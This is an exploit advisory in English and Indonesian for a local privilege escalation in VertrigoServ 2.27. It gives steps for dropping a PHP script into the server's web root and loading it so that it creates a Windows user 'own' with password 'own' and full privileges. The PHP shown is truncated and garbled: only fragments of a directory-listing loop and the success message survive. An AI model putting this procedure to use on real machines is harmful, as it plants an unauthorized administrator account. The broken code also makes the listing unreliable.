===================================================== Vertrigoserv 2.27 Local Privilege Escalation Exploit ==================================================== :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit : # Date : May 19th 2012 : # Author : X-Cisadane : # Software Link : http://vertrigo.sourceforge.net/ : # Version : 2.27 : # Category : Desktop (Windows) Applications : # Platform : Win32 : # Vulnerability : Local Privilege Escalation Exploit : # Tested On : Windows XP Professional Service Pack 3 : # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: Proof Of Concept : ================ [ENGLISH] 1.Run VertrigoServ 2.Create a file named script.php in X:\VertrigoServ Installation Directory\www\ 3.Fill script.php with this script & save! full privileges successfully added";exit;} echo ""; while (false !== ($qQr = readdir($qQd))){ switch(filetype($qQa.$qQr)) { case "dir": echo "".htmlspecialchars($qQr)."
"; break; case "file": echo "".htmlspecialchars($qQr)."
"; break; } } ?> 4.Open your browser & go to http://localhost/script.php?qQx 5.If successfull, it will show this message : User own -> full privileges successfully added 6.Now, open Command Prompt and type Net User then press enter! It will show a new user (own) & the password is own. [INDONESIAN] 1.Jalankan VertrigoServ 2.Buat sebuah berkas dengan nama script.php pada X:\Direktori tempat menginstall VertrigoServ\www\ 3.Isi berkas script.php dengan script berikut & simpan! 4.Buka browser anda, masuk ke http://localhost/script.php?qQx 5.Jika berhasil, akan muncul pesan ini User own -> full privileges successfully added 6.Sekarang buka Command Prompt dan ketik Net User kemudian tekan enter! Kemudian akan muncul sebuah user baru dengan nama own dan password own